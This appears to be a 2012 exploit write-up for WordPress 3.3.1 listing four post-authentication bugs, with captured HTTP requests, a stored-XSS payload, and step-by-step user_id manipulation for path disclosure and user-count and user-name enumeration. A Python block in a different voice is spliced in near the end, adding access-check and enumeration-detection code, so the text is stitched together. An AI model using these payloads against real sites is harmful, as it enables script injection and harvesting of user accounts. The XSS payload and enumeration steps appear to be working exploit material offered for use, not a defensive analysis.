moften

4 vulns wordpress 3.3.1

Mar 23rd, 2012
+--Exploits for WordPress 3.3.1 by HauntIT released 15.02.2012 -------+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1) Post-Auth Information Disclosure

// a. What is the type of vulnerability?
This vulnerability shows us the full path to the WordPress installation on the server.
Information disclosure bug.

The vulnerability can be triggered by users with the 'subscriber' role.
In some cases the bug is available to 'editor'-role users too.

// b. Where is bug :)
Go to your /wordpress/wp-admin/media-upload.php?type=image&tab='&post_id=6

You should now see something similar to:
"Fatal error: Maximum execution time of 30 seconds exceeded in
/path/to/your/wordpress/wp-includes/plugin.php on line 148."

So:
@Wordpress/wp-includes$ cat -n plugin.php | grep 148
148 array_pop($wp_current_filter);

Enjoy ;)
--------------------------------------------------------------------------------
2) Post-Auth Cross Site Scripting

// a. What is the type of vulnerability?

This is a standard persistent XSS for a normal (registered) user (with the 'editor' role).

"An attacker may exploit the html-injection issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials, control how the site
is displayed, and launch other attacks."

// b. Where is bug :)
...cut from Burp...
POST /www/Wordpress/wordpress/wp-admin/post.php HTTP/1.1
(...)
content=qqqqqqqqqqqqqqqqqqqqqq"%2f%3e%3cimg%20src%3dx%20onerror%3dalert(123)%3e%3c
...cut from Burp...

By setting the 'content' parameter to a value containing a JS payload we can trigger the XSS (the
post content is stored and rendered for other users in WP).

A payload to use for the stored XSS could be the 'video' tag:
<video onload=<xss>>
------------------------------------------------------------------------------------------
3) User Count Enumeration

//a. What is the type of vulnerability?
This is a very strange bug, because we can not enumerate the _names_ of users.
We don't get an "information-disclosure"-kind of bug.
The one thing we can do with this bug is find out
the number of users in WordPress. ;)

The number of users (in the webapp) can be used to determine:
- how "popular" this WP site is (by "popular" I mean how many users are registered on this site);
- it can be used when you're bruteforcing names in WP.
Here, if we can get the 'number of users', we can do another thing:
now we know that (for example) the web application has 10 users.
When we get the number of users, we can determine the next attack: bruteforce to enumerate their (users') names.
So, when doing this, we have some kind of 'default login list' file for bruteforce.
Via this file, the bruteforcing progress tells us that (from logins.txt) we found 7 names.
So connecting this information with the information from our bug, we know that
in the web application there are 3 more names (users) to 'get'.

I tested this vulnerability as a registered user. His role was subscriber (so "the lowest" of registered users).

//b. Where is bug :)
Here I'll present some BurpProxy traffic dump:

...cut...
POST /www/Wordpress/wordpress/wp-admin/profile.php HTTP/1.1
Host: localhost
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Connection: close

_wpnonce=f175245608&_wp_http_referer=%2Fwww%2FWordpress%2Fwordpress%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&admin_color=fresh&admin_bar_front=1&first_name=tester&last_name=tester&nickname=tester&display_name=tester&email=tester%40tester.com&url=&aim=&yim=&jabber=&description=&pass1=&pass2=&action=update&user_id=23 OR 1=2&submit=Update+Profile
...cut...

If this user_id exists, we'll get information that:
- we can not edit this user/profile
- we can edit this user/profile (here there won't be info like "now you can change other users" ;). If
we have permissions here to change (others), we will change it (no warning or other "communicate" here)

If there is no user_id = (our integer), then WordPress tells us:
...cut...
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Feb 2012 23:34:34 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.7
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 15 Feb 2012 23:34:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2923

<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix:(...) -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress &rsaquo; Error</title>
<style type="text/css">
(...)

</style>
</head>
<body id="error-page">
<p>Invalid user ID.</p></body>
</html>


...cut...

So now, by bruteforcing numbers with this HTTP POST, an authenticated (normal registered) user
can find out how many users are in the application.

-----------------------------------------------------------------------------------------
4) Post-Auth SQL Injection

//a. What is the type of vulnerability?
This is a kind of weird SQL Injection (or parameter manipulation for 'privilege escalation').
For a user who has admin access there is functionality like "show all users in webapp".
For a normal user (registered, with "role" rights), there isn't functionality like this.
But using WordPress in a way it is not designed for, we can get all user names in
the latest (/installed) WordPress (3.3.1).

//b. Where is bug :)
To trigger this vulnerability, we must log in as a normal (registered/role rights) user.
You should know that this description covers getting only 1 username.
To automate this process to enumerate all users, write your own PoC. ;)

If you're logged in as a normal user ("subscriber"), go to:
wordpress/wp-admin/profile.php

Now you should set the parameters like this:
?_wpnonce=&
_wp_http_referer=&
from=profile&
checkuser_id=&
admin_color=&
admin_bar_front=&
first_name=&
last_name=&
nickname=&
display_name=&
email=tester@tester.com&
url=&
aim=&
yim=&
jabber=&
description=&
pass1=&
pass2=&
action=update&
user_id=3

The vulnerable parameter is (the last one) "user_id".
When we set this parameter to another integer value, we can get the names of other users in the webapp.
The information about the name comes back to us in the error page (so for automated attacks you should
use something like n+1 for the value of the user_id parameter).

I wrote a similar tool for version 3.2.1; here it is:
http://hauntit.blogspot.com/2011/09/wordpress-321-user-enumeration.html
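Bugs 3) and 4) both come down to profile.php accepting a user_id that is not the logged-in user's own (and, in the request quoted under 3), not even an integer). The following is an added example in Python, not code from the paper or from WordPress: it shows the server-side rule a profile endpoint must enforce (own ID only, unless the caller may edit users) and a detection pass over request records that flags sessions probing other IDs. The session IDs, statuses and POST bodies are constructed.

```python
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample of POST bodies sent to wp-admin/profile.php, each tagged with
# the user ID of the authenticated session and the HTTP status the server returned.
# Bodies mirror the shape of the request quoted in the paper (nonce/referer cut).
SAMPLE_REQUESTS = [
    (2, 200, "from=profile&checkuser_id=2&nickname=tester&action=update&user_id=2"),
    (2, 500, "from=profile&checkuser_id=2&action=update&user_id=3"),
    (2, 500, "from=profile&checkuser_id=2&action=update&user_id=4"),
    (2, 500, "from=profile&checkuser_id=2&action=update&user_id=23 OR 1=2"),
    (7, 200, "from=profile&checkuser_id=7&action=update&user_id=7"),
]


def check_profile_update(session_user_id, body, can_edit_users=False):
    """Rule the endpoint should enforce: user_id must be a plain integer and, for
    callers without an edit-users capability, must equal the caller's own ID.
    Returns None when the request is acceptable, otherwise the reason to reject it."""
    params = parse_qs(body, keep_blank_values=True)
    raw = params.get("user_id", [""])[0].strip()
    if not raw.isdigit():
        return "user_id is not an integer"
    if not can_edit_users and int(raw) != session_user_id:
        return "user_id does not match the authenticated user"
    return None


def enumeration_suspects(requests, threshold=2):
    """Detection over logged requests: a session that repeatedly submits a user_id
    other than its own is walking the ID space, whether or not each probe produced
    the 'Invalid user ID' 500 page. Returns {session_user_id: mismatch_count}."""
    mismatches = Counter()
    for session_user_id, _status, body in requests:
        if check_profile_update(session_user_id, body) is not None:
            mismatches[session_user_id] += 1
    return {uid: n for uid, n in mismatches.items() if n >= threshold}


if __name__ == "__main__":
    for uid, status, body in SAMPLE_REQUESTS:
        print(uid, status, check_profile_update(uid, body))
    print(enumeration_suspects(SAMPLE_REQUESTS))  # {2: 3}
```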

Cheers!
-----------------------------------------------------------------------------------------
end of paper.
-----------------------------------------------------------------------------------------
visit us hack4life.com.ar